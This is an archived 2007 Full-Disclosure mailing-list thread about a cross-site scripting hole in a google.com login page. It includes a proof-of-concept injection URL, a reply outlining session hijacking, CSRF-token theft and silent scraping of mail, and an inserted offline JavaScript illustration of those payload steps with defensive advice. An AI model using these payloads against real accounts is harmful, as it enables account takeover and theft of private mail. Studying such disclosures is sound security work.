Re: [Full-disclosure] Gmail 0day

2007-11-09 Thread Adrian P
Hello Juergen,

With all my respect, is it that hard to see that gaining access to a
Gmail session can lead to your identity being stolen?

Nowadays your webmail account means your online life/presence. Let's
walk through an attack, shall we?

1. Your Gmail session is hijacked (e.g. via the XSS PoC posted on FD)

2. Attacker searches for password in 'Inbox'/'Sent Mail'.

- How many times have you clicked on 'Forgot password' on MULTIPLE
online accounts and never changed the password (whether a new one or the
original) that was emailed to you, from the time you received the
forgotten-password email until now?

- How many users have emailed passwords to themselves so that they
don't forget?

- How many users use the same password on MULTIPLE online accounts
(including merchant/e-commerce accounts)?

- How many users have clicked on remember credit card details so
that they don't have to re-enter their CC data every time they perform
an online transaction?

- Did you forget to disable your Gtalk chat history? (Gtalk is still
within the google.com domain)

- Have you saved anything personal on other services such as Google
docs/calendar/notebook? (or any other google.com service that doesn't
require you to re-login once authenticated)

3. For most victims, this leads to a compromise of their online identity.

If you fail to see the problem, then please think before you complain:
"damn, right now 0day are fucking XSS"

Posting an XSS PoC that opens an alert box doesn't have much merit
perhaps. However, this is the equivalent of saying: "hey, I can cause
a BO condition. If you send parameter X with 500 bytes/chars or more,
then EIP is overwritten and the attacked service crashes." Now compare
that to actually compromising the server via the buffer overflow
vulnerability. That's a DIFFERENT STORY.

Same thing goes for any XSS. Now, say: screw a cookie-theft exploit for
the Gmail XSS! (pardon my French) Make something more clever!
Perhaps, you want a payload that scrapes all the victim's emails which
contain keywords such as 'password', 'private', 'admin', and so on.
Then, all the captured data is submitted to the attacker's site in the
background (nothing suspicious is visually happening from the victim's
point of view).

Sure, Gmail has CSRF protection, but that can be bypassed via XSS.
After all, anti-CSRF tokens can be grabbed if URLs can be accessed
within the security context of the target domain (which is possible
via XSS).

If you consider all the aforementioned thoughts plus the fact that
Gmail is one of the most popular webmail services, then you should be
able to understand the power of an XSS vuln on google.com!

Regards,
AP.

On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote:
 wow! 0day!
 damn, right now 0day are fucking XSS ...




 On 11/8/07, silky [EMAIL PROTECTED] wrote:
  worked for me minutes after it was posted. seems fixed now.
 
  On 11/9/07, crazy frog crazy frog  [EMAIL PROTECTED] wrote:
    i tested it on gmail latest version, it's not working for me?
  
   On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED]  wrote:
 There is an HTML injection vulnerability in https://www.google.com.
 It is very critical, you can get the cookie to log in to Gmail or
  other
 services.
   
POC:
   
 https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true&l#;</script><script>alert('xss')</script>1-=1
   
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
   
  
  
  
   --
   advertise on secgeeks?
   http://secgeeks.com/Advertising_on_Secgeeks.com
   http://newskicks.com
  
  
 
 
  --
  mike
  http://lets.coozi.com.au/
 
 






-- 
pagvac
gnucitizen.org, ikwt.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
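
The two points AP makes above (a same-origin payload can read the anti-CSRF token out of any page it fetches, and it can sweep the mailbox for keywords before exfiltrating in the background) are worth seeing in code. The block below is an added illustration, not code from the thread, from xss2root or from Google: it runs offline against a constructed stand-in for a webmail page, and the hidden field name `at`, the `msg`/`subj`/`snip` markup, the `act` parameter and the sample messages are all assumptions made up for the example.

```javascript
// Added illustration (not from the thread): why a same-origin XSS payload
// defeats anti-CSRF tokens and can mine a mailbox for secrets.
// Everything below runs offline on a constructed HTML string; the form
// field name "at", the message markup, the "act" parameter and the
// keyword list are assumptions, not Gmail's real interface.

// Constructed stand-in for a webmail page as the payload would see it after
// a same-origin fetch (XMLHttpRequest/fetch issued by the injected script).
const INBOX_HTML = `
<html><body>
<form action="/mail/?ui=html" method="post">
  <input type="hidden" name="at" value="AF6bupNx4h8PqZ2">
</form>
<div class="msg"><span class="subj">Your new password</span><span class="snip">Your temporary password is hunter2; please change it after login.</span></div>
<div class="msg"><span class="subj">Lunch Friday?</span><span class="snip">Pizza or sushi, your call.</span></div>
<div class="msg"><span class="subj">admin creds</span><span class="snip">Router admin is still the default, don't tell anyone.</span></div>
</body></html>`;

// Anti-CSRF tokens only stop *cross-origin* forgery: script already running
// in the victim's origin reads the token straight out of the fetched page.
function extractCsrfToken(html, fieldName = 'at') {
  const re = new RegExp(
    `<input[^>]*name=["']${fieldName}["'][^>]*value=["']([^"']+)["']`, 'i');
  const m = html.match(re);
  return m ? m[1] : null;
}

// Keyword sweep over the messages: the "scrape everything that mentions
// 'password', 'private', 'admin'" step. Returns only the matching messages.
function findSensitiveMessages(html, keywords) {
  const msgRe = /<div class="msg"><span class="subj">(.*?)<\/span><span class="snip">(.*?)<\/span><\/div>/g;
  const hits = [];
  let m;
  while ((m = msgRe.exec(html)) !== null) {
    const text = (m[1] + ' ' + m[2]).toLowerCase();
    const matched = keywords.filter(k => text.includes(k.toLowerCase()));
    if (matched.length) hits.push({ subject: m[1], snippet: m[2], matched });
  }
  return hits;
}

// Assemble the state-changing request the payload could now send with the
// stolen token. Nothing is sent here; the object shows what the token check
// does and does not buy once script runs in the origin.
function buildAuthenticatedRequest(token, action, params) {
  if (!token) throw new Error('no token found; server would reject the request');
  const body = new URLSearchParams({ ...params, at: token });
  return { method: 'POST', url: action, body: body.toString() };
}

// The three steps chained as the injected script would chain them.
function runPayload(html) {
  const token = extractCsrfToken(html);
  const loot = findSensitiveMessages(html, ['password', 'private', 'admin']);
  // "act" is a hypothetical action parameter for illustration only.
  const req = buildAuthenticatedRequest(token, '/mail/?ui=html', { act: 'example' });
  return { token, loot, req };
}

console.log(JSON.stringify(runPayload(INBOX_HTML), null, 2));
```

The takeaway for defenders is the one AP is driving at: an anti-CSRF token is not an XSS mitigation, and neither is an HttpOnly cookie, since the payload never needs the cookie when it can issue authenticated requests from inside the session. The only fix for the class of bug in this thread is contextual output encoding at the injection point.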


Re: [Full-disclosure] Gmail 0day

2007-11-08 Thread jam
On Fri, Nov 09, 2007 at 09:09:48AM +1100, silky wrote:
 
 news at 11: xss leads to ability to steal data.
 

that headline doesn't have enough 'fauxnews' in it.. how about

<voice id='themoviefoneguythatwasalsoingeicocommercials'>tonight at 11... is
your personal data in the hands of hackers? don't miss our 42 part special
report that uncovers the truth about your personal data on the internet</voice>

regards,
jonez
-- 
http://zoidtechnologies.com/ -- software that sucks less

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Gmail 0day

2007-11-08 Thread pdp (architect)
this means a lot today :) if you haven't noticed!

On Nov 8, 2007 10:00 PM, silky [EMAIL PROTECTED] wrote:

 On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote:
  well this XSS can lead to so much data being stolen that it is not even
  funny!

 orly?




-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gmail 0day

2007-11-08 Thread pdp (architect)
well this XSS can lead to so much data being stolen that it is not even
funny!

On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote:

 wow! 0day!
 damn, right now 0day are fucking XSS ...


 On 11/8/07, silky [EMAIL PROTECTED] wrote:
 
  worked for me minutes after it was posted. seems fixed now.
 
  On 11/9/07, crazy frog crazy frog  [EMAIL PROTECTED] wrote:
    i tested it on gmail latest version, it's not working for me?
  
   On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED]  wrote:
 There is an HTML injection vulnerability in https://www.google.com.
 It is very critical, you can get the cookie to log in to Gmail or
   other
 services.
   
POC:
   
  https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true&l#;</script><script>alert('xss')</script>1-=1
 
   
More:http://xss2root.blogspot.com/
   
  
  
  
   --
   advertise on secgeeks?
   http://secgeeks.com/Advertising_on_Secgeeks.com
   http://newskicks.com
  
  
 
 
  --
  mike
  http://lets.coozi.com.au/
 
 






-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gmail 0day

2007-11-08 Thread Juergen Marester
wow! 0day!
damn, right now 0day are fucking XSS ...


On 11/8/07, silky [EMAIL PROTECTED] wrote:

 worked for me minutes after it was posted. seems fixed now.

 On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
   i tested it on gmail latest version, it's not working for me?
 
  On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
    There is an HTML injection vulnerability in https://www.google.com.
    It is very critical, you can get the cookie to log in to Gmail or
  other
    services.
  
   POC:
  
  https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true&l#;</script><script>alert('xss')</script>1-=1
  
   More:http://xss2root.blogspot.com/
  
 
 
 
  --
  advertise on secgeeks?
  http://secgeeks.com/Advertising_on_Secgeeks.com
  http://newskicks.com
 
 


 --
 mike
 http://lets.coozi.com.au/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Gmail 0day

2007-11-08 Thread silky
On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote:
 well this XSS can lead to so much data being stolen that it is not even
 funny!

orly?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Gmail 0day

2007-11-08 Thread silky
worked for me minutes after it was posted. seems fixed now.

On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
 i tested it on gmail latest version, it's not working for me?

 On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
  There is an HTML injection vulnerability in https://www.google.com.
  It is very critical, you can get the cookie to log in to Gmail or other
  services.
 
  POC:
  https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true&l#;</script><script>alert('xss')</script>1-=1
 
  More:http://xss2root.blogspot.com/
 



 --
 advertise on secgeeks?
 http://secgeeks.com/Advertising_on_Secgeeks.com
 http://newskicks.com




-- 
mike
http://lets.coozi.com.au/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Gmail 0day

2007-11-08 Thread silky
On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote:
 this means a lot today :) if you haven't noticed!

of course i've noticed, it's just pretty fucking obvious to absolutely
everyone. i don't really see why you decided to point it out.

news at 11: xss leads to ability to steal data.


 On Nov 8, 2007 10:00 PM, silky [EMAIL PROTECTED] wrote:
 
  On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote:
   well this XSS can lead to so much data being stolen that it is not even
   funny!
 
  orly?
 



 --
 pdp (architect) | petko d. petkov
 http://www.gnucitizen.org


-- 
mike
http://lets.coozi.com.au/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Gmail 0day

2007-11-08 Thread Juha-Matti Laurio
This was listed as 'Fixed' at Xssed.com when released about 17 hours ago (or 
maybe earlier).
Link (note: a mirror page generates JS pop-up etc.):
http://www.xssed.com/mirror/25472/

- Juha-Matti


silky [EMAIL PROTECTED] wrote: 
 worked for me minutes after it was posted. seems fixed now.
 
 On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
   i tested it on gmail latest version, it's not working for me?
 
  On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
    There is an HTML injection vulnerability in https://www.google.com.
    It is very critical, you can get the cookie to log in to Gmail or other
    services.
  
   POC:
    https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true&l#;</script><script>alert('xss')</script>1-=1
  
   More:http://xss2root.blogspot.com/
  
 
 
 
  --
  advertise on secgeeks?
  http://secgeeks.com/Advertising_on_Secgeeks.com
  http://newskicks.com
 
 
 
 
 -- 
 mike
 http://lets.coozi.com.au/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Gmail 0day

2007-11-07 Thread Scripter Hack
There is an HTML injection vulnerability in https://www.google.com.
It is very critical, you can get the cookie to log in to Gmail or other
services.

POC:
https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=true&l#;</script><script>alert('xss')</script>1-=1

More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/